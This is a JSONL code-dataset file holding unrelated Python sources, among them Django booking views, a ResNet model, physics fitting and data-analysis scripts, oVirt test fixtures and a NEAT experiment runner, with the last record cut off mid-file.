+{"seq_id":"249974860","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views import View\nfrom datetime import datetime\n\nfrom .models import *\n\n# Create your views here.\n\ntoday = datetime.today().strftime('%Y-%m-%d')\n\n\ndef index(request):\n # use lowercase locals so the Hall model class is not shadowed\n halls = Hall.objects.all()\n status = {}\n\n for hall in halls:\n if hall.reservation_set.filter(date=today):\n status[hall.id] = 'Busy'\n else:\n status[hall.id] = 'Free'\n ctx = {\n 'Halls': halls,\n 'status': status,\n }\n return render(request, 'Book/index.html', ctx)\n\n\n# renamed from Hall so this view does not shadow the Hall model at module level\ndef hall_detail(request, id):\n hall = Hall.objects.get(pk=int(id))\n if hall:\n reservations = hall.reservation_set.filter(date__gte=today).order_by('date')\n halls = Hall.objects.all()\n if hall.projector:\n projector = \"Yes\"\n else:\n projector = \"No\"\n ctx = {\n \"Hall\": hall,\n \"projector\": projector,\n \"reservations\": reservations,\n \"Halls\": halls,\n }\n else:\n ctx = {\n \"Hall\": 'Hall Not Available',\n \"projector\": 'NA',\n \"reservations\": 'NA',\n \"Halls\": 'NA',\n }\n return render(request, 'Book/Hall.html', ctx)\n\n\nclass NewHallView(View):\n\n def get(self, request):\n return render(request, 'Book/new_Hall.html')\n\n 
def post(self, request):\n try:\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n projector = request.POST.get(\"projector\")\n proj = True if projector == \"True\" else False\n\n Hall.objects.create(name=name, capacity=capacity, projector=proj)\n return redirect(\"/\")\n\n except Exception as e:\n message = \"Incorrect Data: {}\".format(e)\n ctx = {\n \"message\": message,\n }\n return render(request, 'Book/new_Hall.html', ctx)\n\n\nclass ModifyView(View):\n\n def get(self, request, id):\n hall = Hall.objects.get(pk=id)\n ctx = {\n \"Hall\": hall,\n }\n return render(request, 'Book/modify.html', ctx)\n\n def post(self, request, id):\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n projector = True if request.POST.get('projector') else False\n hall = Hall.objects.get(pk=id)\n try:\n hall.name = name\n hall.capacity = capacity\n hall.projector = projector\n hall.save()\n return redirect(\"/\")\n except Exception as e:\n message = \"Incorrect Data: {}\".format(e)\n ctx = {\n \"message\": message,\n \"Hall\": hall,\n }\n return render(request, 'Book/modify.html', ctx)\n\n\nclass DeleteView(View):\n\n def get(self, request, id):\n hall = Hall.objects.get(pk=id)\n ctx = {\n \"Hall\": hall,\n }\n return render(request, 'Book/delete.html', ctx)\n\n def post(self, request, id):\n action = request.POST.get(\"submit\")\n\n if action == \"Yes\":\n hall = Hall.objects.get(pk=id)\n hall.delete()\n return redirect(\"/\")\n\n\nclass ReservationView(View):\n\n def get(self, request, id):\n hall = Hall.objects.get(pk=id)\n reservations = hall.reservation_set.filter(date__gte=today).order_by('date')\n ctx = {\n \"Hall\": hall,\n \"reservations\": reservations,\n }\n return render(request, 'Book/reservation.html', ctx)\n\n def post(self, request, id):\n hall = Hall.objects.get(pk=id)\n reservations = hall.reservation_set.filter(date__gte=today).order_by('date')\n try:\n date = request.POST.get(\"date\")\n comment = request.POST.get(\"comment\")\n message = \"\"\n\n if hall.reservation_set.filter(date=date):\n message = \"This Hall is already occupied for that day\"\n elif date < today:\n message = \"The chosen date cannot be in the past\"\n\n if (message == \"This Hall is already occupied for that day\"\n or message == \"The chosen date cannot be in the past\"):\n ctx = {\n \"Hall\": hall,\n \"reservations\": reservations,\n \"message\": message,\n }\n return render(request, 'Book/reservation.html', ctx)\n\n reservation = Reservation.objects.create(date=date, comment=comment)\n reservation.Hall.add(hall)\n\n except Exception as e:\n message = \"Incorrect Data: {}\".format(e)\n ctx = {\n \"message\": message,\n \"Hall\": hall,\n \"reservations\": reservations,\n }\n return render(request, 'Book/reservation.html', ctx)\n\n if hall.projector:\n projector = \"Yes\"\n else:\n projector = \"No\"\n message = \"\"\"Thank you! 
You have booked hall: \n {} on: {}\"\"\".format(hall.name, date)\n ctx = {\n \"Hall\": hall,\n \"projector\": projector,\n \"reservations\": reservations,\n \"message\": message,\n }\n return render(request, 'Book/Hall.html', ctx)\n\n\nclass SearchView(View):\n\n def get(self, request):\n hall_name = request.GET.get(\"Hall\")\n capacity = request.GET.get(\"capacity\")\n date = request.GET.get(\"date\")\n projector = True if request.GET.get('projector') else False\n\n result1 = Hall.objects.exclude(reservation__date=date)\n\n if hall_name == \"\":\n result2 = result1\n else:\n result2 = result1.filter(name__icontains=hall_name)\n\n if capacity != \"\":\n result3 = result2.filter(capacity__gte=int(capacity))\n else:\n result3 = result2\n\n if projector:\n result4 = result3.filter(projector=projector)\n else:\n result4 = result3\n\n ctx = {\n \"results\": result4,\n \"date\": date,\n }\n return render(request, 'Book/search.html', ctx)\n\n\n\n\n\n","sub_path":"BookConferenceHallApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491428025","text":"\"\"\"\nQ031 Next Permutation\nMedium\n\nArray;\n\nthis solution passed but it's not in place!\n\nImplement next permutation, which rearranges numbers\ninto the lexicographically next greater permutation of numbers.\n(that means the order in dictionary)\n\nIf such arrangement is not possible, it must rearrange it\nas the lowest possible order (ie, sorted in ascending order).\n\nThe replacement must be in-place and use only constant extra\nmemory.\n\nHere are some examples. Inputs are in the left-hand column\nand its corresponding outputs are in the right-hand column.\n\n1,2,3 → 1,3,2\n3,2,1 → 1,2,3\n1,1,5 → 1,5,1\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n def swap(i):\n # scan the suffix from the right: it is non-increasing there, so the\n # first match is the smallest value strictly greater than nums[i]\n for j in reversed(range(i+1, total)):\n if nums[i] < nums[j]:\n nums[i], nums[j] = nums[j], nums[i]\n return j\n return False\n\n total = len(nums)\n\n for i in reversed(range(0, total-1)):\n # swap the rightmost pivot with the smallest larger value to its right\n if swap(i):\n # sort the numbers after the pivot\n nums[i+1:] = sorted(nums[i+1:])\n break\n else:\n # already the highest permutation: reset to ascending order\n nums.sort()\n\n\na = [1,1,1]\n\nsol = Solution()\nsol.nextPermutation(a)\nprint(a)","sub_path":"Q031.py","file_name":"Q031.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20235576","text":"class car:\r\n def __init__(self,manufacture,model,make,transmission,color):\r\n self.manufacture = manufacture\r\n self.model = model\r\n self.make = make\r\n self.transmission = transmission\r\n self.color = color\r\n\r\n def accelerate(self):\r\n print((\"{} {} is moving\").format(self.manufacture,self.model))\r\n\r\n def stop(self):\r\n print((\"{} {} has stopped\").format(self.manufacture,self.model))\r\n\r\nc1 = car(\"Tata\",\"Altroz\",\"2020\",\"Automatic\",\"Midtown Grey\")\r\nc2 = car(\"Mercedes-Benz\",\"GLA\",\"2021\",\"Automatic\",\"Black\")\r\nc3 = 
car(\"BMW\",\"X1\",\"2021\",\"Automatic\",\"White\")\r\n\r\nc1.accelerate()\r\nc1.stop()\r\n\r\nc2.accelerate()\r\nc2.stop()\r\n\r\nc3.accelerate()\r\nc3.stop()\r\n\r\n\r\n","sub_path":"python/Activity16.py","file_name":"Activity16.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574591535","text":"import os\nimport csv\n\ncsvpath=os.path.join('Resources','budget_data.csv')\n\nwith open (csvpath, 'r') as csv_file:\n csv_read=csv.reader(csv_file, delimiter=',')\n \n csv_header=next(csv_read)\n \n date=[]\n pl=[]\n plch=[]\n total_pl = 0.0\n total_plch = 0.0\n max_pld=[]\n min_pld=[]\n \n for budget_data in csv_read:\n date.append(budget_data[0])\n pl.append(budget_data[1])\n\n #The total number of months included in the dataset\n total_months = len(date)\n \n #The net total amount of \"Profit/Losses\" over the entire period\n for row in range(total_months):\n total_pl += float(pl[row])\n \n #The changes in \"Profit/Losses\" over the entire period, then find the average of those changes \n for row1 in range(1, (total_months)):\n plch.append(float(pl[row1]) - float(pl[(row1-1)]))\n total_plch += float(plch[(row1-1)])\n #average\n #total_plch += float(plch[row1])\n ave_plch = total_plch / (total_months - 1)\n \n #The greatest increase in profits (date and amount) over the entire period\n #The greatest decrease in losses (date and amount) over the entire period\n max_pl = max(plch)\n min_pl = min(plch)\n\n date1=[]\n #include the last change as well so date1 stays aligned with plch\n for r1 in range(1, len(plch)+1):\n date1.append(date[r1])\n maxpl_zip = zip(date1, plch)\n\n mz=list(maxpl_zip)\n \n for row2 in range(len(plch)):\n if plch[row2] == max_pl:\n max_pld = mz[row2] \n elif plch[row2] == min_pl:\n min_pld = mz[row2]\n \n \n print(\"-----------------------------\")\n print(\"Financial Analysis\")\n print(\"-----------------------------\")\n print(f\"Total Months: {total_months}\")\n print(f\"Total: ${int(total_pl)}\")\n print(f\"Average Change: ${round(ave_plch,2)}\")\n print(\"Greatest Increase in Profits: \" + str(max_pld[0]) + \" ($\" + str(int(max_pld[1])) + \")\")\n print(\"Greatest Decrease in Profits: \" + str(min_pld[0]) + \" ($\" + str(int(min_pld[1])) + \")\") \n print(\"'''\")\n\n\noutput_path = os.path.join('Financial_Analysis.txt')\nwith open(output_path, 'w', newline='') as fao: \n\n fao.write(\"----------------------------- \\n\")\n fao.write(\"Financial Analysis \\n\")\n fao.write(\"----------------------------- \\n\")\n fao.write(f\"Total Months: {total_months} \\n\")\n fao.write(f\"Total: ${int(total_pl)} \\n\")\n fao.write(f\"Average Change: ${round(ave_plch,2)} \\n\")\n fao.write(\"Greatest Increase in Profits: \" + str(max_pld[0]) + \" ($\" + str(int(max_pld[1])) + \") \\n\")\n fao.write(\"Greatest Decrease in Profits: \" + str(min_pld[0]) + \" ($\" + str(int(min_pld[1])) + \") \\n\")","sub_path":"PyBank/main_otxt.py","file_name":"main_otxt.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45446032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, 
bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion * planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, block, num_blocks, strides=[1, 2, 2, 2], plane=64, num_classes=10):\n super(ResNet, self).__init__()\n self.in_planes = plane\n self.in_planes_1 = plane\n\n self.conv1 = nn.Conv2d(3, plane, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(plane)\n self.layer1 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:1]), num_blocks[0], stride=strides[0])\n self.layer2 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:2]), num_blocks[1], stride=strides[1])\n self.layer3 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:3]), num_blocks[2], stride=strides[2])\n self.layer4 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:4]), num_blocks[3], stride=strides[3])\n self.pool = nn.AdaptiveAvgPool2d((1, 1))\n self.linear = nn.Linear(self.in_planes_1 * np.prod(strides[:4]) * block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = self.pool(out)\n out = self.linear(out.flatten(1))\n return out\n\n\ndef ResNet10(channel=64, num_blocks=[2, 2, 2, 2], strides=[1, 2, 2, 2], num_classes=10, **kwargs):\n return ResNet(BasicBlock, num_blocks, strides, channel, num_classes)\n\n\ndef ResNet18():\n return ResNet(BasicBlock, [2, 2, 2, 2])\n\n\ndef ResNet34():\n return ResNet(BasicBlock, [3, 4, 6, 3])\n\n\ndef ResNet50():\n return ResNet(Bottleneck, [3, 4, 6, 3])\n\n\ndef ResNet101():\n return ResNet(Bottleneck, [3, 4, 23, 3])\n\n\ndef ResNet152():\n return ResNet(Bottleneck, [3, 8, 36, 3])\n\n\ndef test():\n net = ResNet10(16, [1, 1, 1, 1])\n y = net(torch.randn(1, 3, 32, 32))\n print(sum(p.numel() for p in net.parameters() if p.requires_grad))\n 
print(y.size())\n","sub_path":"models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"463925463","text":"from ROOT import TFile, gROOT, gStyle, TH1F, TH2F, kBlue, kRed, TCanvas, TLatex, TLegend\nimport os, numpy, copy\nfrom officialStyle import officialStyle\n\n\ngROOT.SetBatch(True)\nofficialStyle(gStyle)\ngStyle.SetPadLeftMargin(0.18)\ngStyle.SetPadBottomMargin(0.15)\n\ndef returnRange(hist):\n \n bin = []\n \n for ibin in range(0, hist.GetNbinsX()+1):\n proj = hist.ProjectionY(\"ProjY_\"+str(ibin), ibin, ibin+1)\n if proj.GetEntries() > 100:\n bin.append(ibin)\n\n return min(bin), max(bin)\n\n\n\ndef LegendSettings(leg):\n leg.SetBorderSize(0)\n leg.SetFillColor(10)\n leg.SetLineColor(0)\n leg.SetFillStyle(0)\n leg.SetTextSize(0.035)\n leg.SetTextFont(42)\n\ncolours = [2, 3, 4, 6, 7, 8]\n\nprocess = 'DY'\n#process = 'VBF'\n\ndirectory = 'sample_20140513'\n\nsamples = []\nif process=='DY':\n samples = ['DY_Standard', 'DY_Timing', 'DY_3DandTiming']\nelif process=='VBF':\n samples = ['VBF_Standard125', 'VBF_Timing125', 'VBF_3DandTiming125']\n\n\nplots = ['tau_iso_neutralPt','tau_iso_neutralPtWeight1','tau_iso_neutralPtWeight2','tau_iso_neutralPtWeight1NQ','tau_iso_neutralPtWeight2NQ']\n\nplotleg = ['#Sigma_{neutral} p_{T} [GeV]', \n '#Sigma_{neutral, weight1} p_{T} [GeV]',\n '#Sigma_{neutral, weight1 NQ} p_{T} [GeV]',\n '#Sigma_{neutral, weight2} p_{T} [GeV]',\n '#Sigma_{neutral, weight2 NQ} p_{T} [GeV]',\n ]\n\nbarrel_endcap = ['all', 'barrel', 'endcap']\n\n\nhist2d_save = [[[i for i in range(len(samples))] for j in range(len(barrel_endcap))] for k in range(len(plots))]\nhist_save = [[[i for i in range(len(samples))] for j in range(len(barrel_endcap))] for k in range(len(plots))]\nf1_save = [[[i for i in range(len(samples))] for j in range(len(barrel_endcap))] for k in range(len(plots))]\n\n\nfor iplot, plot in enumerate(plots):\n for ibe, isbarrel in enumerate(barrel_endcap):\n\n hist = [i for i in range(len(samples))]\n hist2d = [i for i in range(len(samples))]\n f1 = [i for i in range(len(samples))]\n \n cname = 'can_' + plot + '_' + isbarrel\n can = TCanvas(cname, cname)\n\n for ii, sample in enumerate(samples):\n\n tfile = TFile('{dir}/{sample}/TauTreeProducer/TauTreeProducer_tree.root'.format(dir=directory, sample=sample))\n tree = tfile.Get('TauTreeProducer')\n \n hname = 'h_' + sample + '_' + isbarrel + '_' + plot\n hist[ii] = TH2F(hname, hname, 80,0,80, 60,0,60)\n# hist[ii].Sumw2()\n \n if isbarrel=='all':\n tree.Draw(plot + ':tau_iso_sumPUPt >> ' + hname, 'TMath::Abs(parton_pdgId)==15 && tau_decayModeFinding==1')\n elif isbarrel=='barrel':\n tree.Draw(plot + ':tau_iso_sumPUPt >> ' + hname, 'TMath::Abs(parton_pdgId)==15 && tau_decayModeFinding==1 && TMath::Abs(tau_eta) < 1.479')\n else:\n tree.Draw(plot + ':tau_iso_sumPUPt >> ' + hname, 'TMath::Abs(parton_pdgId)==15 && tau_decayModeFinding==1 && TMath::Abs(tau_eta) > 1.479')\n\n\n fitmin, fitmax = returnRange(hist[ii])\n hist2d[ii] = hist[ii].ProfileX()\n hist2d[ii].Fit(\"pol1\",\"\",\"\",fitmin, fitmax)\n f1[ii] = hist2d[ii].GetFunction(\"pol1\");\n \n hist2d[ii].GetXaxis().SetTitle('#Sigma_{PU} p_{T} [GeV]')\n hist2d[ii].GetYaxis().SetTitle(plotleg[iplot])\n hist2d[ii].SetMaximum(20)\n hist2d[ii].SetMinimum(0)\n hist2d[ii].SetMarkerSize(0.1)\n hist2d[ii].SetMarkerColor(colours[ii])\n hist2d[ii].SetLineColor(colours[ii])\n \n tname = process + ', ' + isbarrel\n hist2d[ii].SetTitle(tname)\n\n 
hist_save[iplot][ibe][ii] = copy.deepcopy(hist[ii])\n hist2d_save[iplot][ibe][ii] = copy.deepcopy(hist2d[ii])\n f1_save[iplot][ibe][ii] = copy.deepcopy(f1[ii])\n\n\n leg = TLegend(0.2,0.75,0.7,0.9)\n LegendSettings(leg)\n\n for ii, sample in enumerate(samples):\n if ii==0:\n hist2d_save[iplot][ibe][ii].Draw()\n else:\n hist2d_save[iplot][ibe][ii].Draw('same')\n \n f1_save[iplot][ibe][ii].SetLineColor(colours[ii])\n f1_save[iplot][ibe][ii].SetLineStyle(2)\n f1_save[iplot][ibe][ii].SetRange(hist2d_save[iplot][ibe][ii].GetXaxis().GetXmin(), hist2d_save[iplot][ibe][ii].GetXaxis().GetXmax())\n f1_save[iplot][ibe][ii].Draw('same')\n\n lname = sample.replace('_', ' ').replace('3DandTiming', '3D & Timing').replace('125','') + ', (' + str(\"{0:.3f}\".format(f1_save[iplot][ibe][ii].GetParameter(1))) + ', ' + str(\"{0:.1f}\".format(round(f1_save[iplot][ibe][ii].GetParameter(0),1))) + ')'\n leg.AddEntry(hist2d_save[iplot][ibe][ii], lname, 'l')\n\n leg.Draw()\n\n sname = 'plot/isolation_' + plot + '_' + isbarrel + '_' + process + '_neutral_vs_puiso.gif'\n can.SaveAs(sname)\n\n\nfile = TFile('root/Myroot_' + process + '.root','recreate')\n\nfor iplot, plot in enumerate(plots):\n for ibe, isbarrel in enumerate(barrel_endcap):\n for ii, sample in enumerate(samples):\n hist_save[iplot][ibe][ii].Write()\n hist2d_save[iplot][ibe][ii].Write()\n\n \nfile.Write()\nfile.Close()\n","sub_path":"AnalysisSpecific/TauIsolation/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615848333","text":"import pickle\nfrom indra.tools.model_checker import ModelChecker\n#from manual_stmts import stmts as manual_stmts\nfrom assemble_pysb import set_context, add_observables\nimport process_data\nfrom indra.util import write_unicode_csv\nfrom indra.assemblers import PysbAssembler\nimport make_stmts_for_checking as make_stmts\n\nprint(\"Processing data\")\n\ndata = process_data.read_data(process_data.data_file)\ndata_genes = process_data.get_all_gene_names(data)\n\n\nprint('Loading data statements.')\ndata_stmts, data_values = make_stmts.run(dec_thresh=0.5, inc_thresh=1.5)\n\nwith open('korkut_stmts_no_ev.pkl', 'rb') as f:\n print('Loading korkut_model_pysb statements.')\n base_stmts = pickle.load(f)\n\n# Merge the sources of statements\n# stmts = manual_stmts + base_stmts\nstmts = base_stmts\n#stmts = manual_stmts\n\n# Assemble model\npa = PysbAssembler()\npa.add_statements(stmts)\nmodel = pa.make_model()\n\n#with open('korkut_pysb.pkl', 'wb') as f:\n# pickle.dump(pa.model, f)\n\n# Preprocess and assemble the pysb model\n#model = assemble_pysb(combined_stmts, data_genes, '')\n\nmc = ModelChecker(model)\n\n# Iterate over each drug/ab statement subset\nresults = []\nfor drug_name, ab_dict in data_stmts.items():\n for ab, stmt_list in ab_dict.items():\n value = data_values[drug_name][ab]\n # For each subset, check statements; if any of them checks out, we're\n # good and can move on to the next group\n print(\"-- Checking the effect of %s on %s --\" % (drug_name, ab))\n relation = 'positive' if value > 1 else 'negative'\n path_found = 0\n path = ''\n for stmt in stmt_list:\n print(\"Checking: %s\" % stmt)\n result = mc.check_statement(stmt)\n if result:\n print(\"Path found, skipping rest\")\n path_found = 1\n path = str(result)\n break\n else:\n print(\"No path found\")\n\n results.append((drug_name, ab, relation, value, path_found, path))\nwrite_unicode_csv('model_check_results.csv', 
results)\n","sub_path":"models/phase3_eval/check_pysb_model.py","file_name":"check_pysb_model.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"511838588","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFixtures for host_network_api\n\"\"\"\n\nimport pytest\n\nimport config as network_api_conf\nimport helper\nfrom art.rhevm_api.tests_lib.high_level import (\n hosts as hl_hosts,\n networks as hl_networks\n)\nfrom art.rhevm_api.tests_lib.low_level import (\n events as ll_events,\n hosts as ll_hosts\n)\nfrom art.unittest_lib import testflow\nimport rhevmtests.networking.config as conf\n\n\n@pytest.fixture(scope=\"class\")\ndef remove_network(request):\n \"\"\"\n Remove network.\n \"\"\"\n nets_to_remove = request.node.cls.nets_to_remove\n assert hl_networks.remove_networks(\n positive=True, networks=nets_to_remove, data_center=conf.DC_0\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef update_host_to_another_cluster(request):\n \"\"\"\n Update host to another cluster.\n \"\"\"\n def fin():\n \"\"\"\n Move host to original cluster.\n \"\"\"\n assert ll_hosts.update_host(\n positive=True, host=conf.HOST_0_NAME, cluster=conf.CL_0\n )\n request.addfinalizer(fin)\n\n assert ll_hosts.update_host(\n positive=True, host=conf.HOST_0_NAME, cluster=network_api_conf.SYNC_CL\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef manage_ip_and_refresh_capabilities(request):\n \"\"\"\n Set temporary IP on interface and refresh capabilities.\n \"\"\"\n host = conf.HOST_0_NAME\n for net, actual_ip, actual_netmask in (\n request.node.cls.manage_ip_list\n ):\n actual_netmask = actual_netmask or \"24\"\n testflow.setup(\n \"Set temporary IP on %s with: IP=%s, Netmask=%s\",\n net, actual_ip, actual_netmask\n )\n helper.manage_host_ip(\n interface=net, ip=actual_ip, netmask=actual_netmask\n )\n last_event = ll_events.get_max_event_id()\n assert ll_hosts.refresh_host_capabilities(\n host=host, start_event_id=last_event\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef reboot_host(request):\n \"\"\"\n Reboot host\n \"\"\"\n host = conf.HOSTS[2]\n vds = conf.VDS_HOSTS[2]\n testflow.setup(\"Reboot host %s\", host)\n assert hl_hosts.deactivate_host_if_up(host=host, host_resource=vds)\n vds.add_power_manager(pm_type=conf.SSH_TYPE)\n vds.get_power_manager().restart()\n for is_connective in (False, True):\n vds.executor().wait_for_connectivity_state(\n positive=is_connective\n )\n\n assert hl_hosts.activate_host_if_not_up(host=host, host_resource=vds)\n","sub_path":"art/tests/rhevmtests/networking/host_network_api/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270560325","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/8/29 09:05\n# @Author : Maloney\n# @Site : jma@192.168.126.124\n# @File : mnist_loader.py\n# @Software: PyCharm\n\n#### Libraries\n\n# Standard library\n\nimport pickle\n\nimport gzip\n\n# Third-party libraries\n\nimport numpy as np\n\n\ndef load_data():\n f = gzip.open('neural-networks-and-deep-learning/data/mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = pickle.load(f)\n f.close()\n return (training_data, validation_data, test_data)\n\n\ndef load_data_wrapper():\n tr_d, va_d, te_d = load_data()\n\n training_inputs = [np.reshape(x, (784, 1)) for x in tr_d[0]]\n\n training_results = [vectorized_result(y) for y in tr_d[1]]\n\n training_data = 
zip(training_inputs, training_results)\n\n validation_inputs = [np.reshape(x, (784, 1)) for x in va_d[0]]\n\n validation_data = zip(validation_inputs, va_d[1])\n\n test_inputs = [np.reshape(x, (784, 1)) for x in te_d[0]]\n\n test_data = zip(test_inputs, te_d[1])\n\n return (training_data, validation_data, test_data)\n\n\ndef vectorized_result(j):\n e = np.zeros((10, 1))\n\n e[j] = 1.0\n\n return e\n","sub_path":"NetWork/mnist_loader.py","file_name":"mnist_loader.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"259564721","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 3 18:30:01 2019\n\n@author: lenovo\n\"\"\"\n#def palindrome_number(list_a):\n # c=0\nn=input(\"Enter the number\").split(\" \")\n#these are the t\nfor i in n:\n if i == i[::-1]:\n print(i)\nt=n\nrev=0\n#this is define the rewverse\nrem = i % 10\n#it used as the remainder\nrev=rev*10+rem\n#it is find the reverse number\ni=i/10\n#if rev==n\nif rev == i:\n print(\"number is palindrome\")\nelse:\n print(\"number is not palindrome\")","sub_path":"day02/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478169671","text":"import os\nimport time\nimport neat\nfrom gym_multi_robot import visualize\nfrom gym_multi_robot.object_serializer import ObjectSerializer\n\n\nclass SingleExperiment:\n \"\"\" This class gives the functions required to run a single experiment.\"\"\"\n\n def __init__(self, learning_config, exp_runner, num_generations, exp_name='', num_trails=1, base_directory=''):\n self.exp_name = exp_name\n self.learning_config = learning_config\n self.exp_runner = exp_runner\n self.num_generations = num_generations\n self.num_trails = num_trails\n self.winner = None # Stores the winner of the last experiment.\n self.stats = None # Stores the stats about the last experiment.\n self.base_directory = base_directory\n\n def eval_genomes(self, genomes, config):\n start_time = time.time()\n\n for genome_id, genome in genomes:\n\n self.process_genome(genome, config)\n # sub rewards.\n\n end_time = time.time()\n time_diff = end_time - start_time\n avg_time = time_diff / len(genomes)\n\n print(\"generation total_runtime: %s seconds, avg_runtime: %s seconds\" % (time_diff, avg_time))\n\n def process_genome(self, genome, config):\n \"\"\" This function processes a genome to finds its fitness and possibly other details. 
\"\"\"\n genome.fitness = self.exp_runner.run_multiple_trails(genome, config, self.num_trails)\n\n def run(self, name=None):\n \"\"\" Runs the experiment.\n Name parameter can be used to update the name of the experiment.\n \"\"\"\n if name is not None:\n self.exp_name = name\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(self.learning_config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n self.stats = neat.StatisticsReporter()\n p.add_reporter(self.stats)\n\n # Run experiments\n try:\n self.winner = p.run(self.eval_genomes, self.num_generations)\n except Exception:\n raise\n finally:\n self.winner = p.best_genome\n\n self.output_stats()\n self.output_winner()\n\n\n def output_winner(self):\n \"\"\"This function outputs the current winner in graph and in pickle file.\"\"\"\n self.init_base_directory()\n\n net_filename = self.base_directory + 'graph_winner' + str(self.exp_name)\n genome_filename = self.base_directory + 'winner' + str(self.exp_name)\n\n if self.exp_runner is not None:\n self.exp_runner.draw(self.winner, self.learning_config, net_filename)\n\n ObjectSerializer.serialize(self.winner, genome_filename)\n\n print(self.winner)\n\n def output_stats(self):\n \"\"\" This function outputs the statistics in figures and in reusable objects.\"\"\"\n self.init_base_directory()\n\n fitness_out_file = self.base_directory + 'avg_fitness_' + str(self.exp_name) + '.svg'\n species_out_file = self.base_directory + 'species_' + str(self.exp_name) + '.svg'\n stats_out_file = self.base_directory + 'stats' + str(self.exp_name)\n\n visualize.visualize_stats(self.stats, fitness_out_file, species_out_file)\n ObjectSerializer.serialize(self.stats, stats_out_file)\n\n def init_base_directory(self):\n \"\"\" This function checks whether the base directory exists and creates it if it doesn't. \"\"\"\n\n if self.base_directory != '' and not os.path.exists(self.base_directory):\n 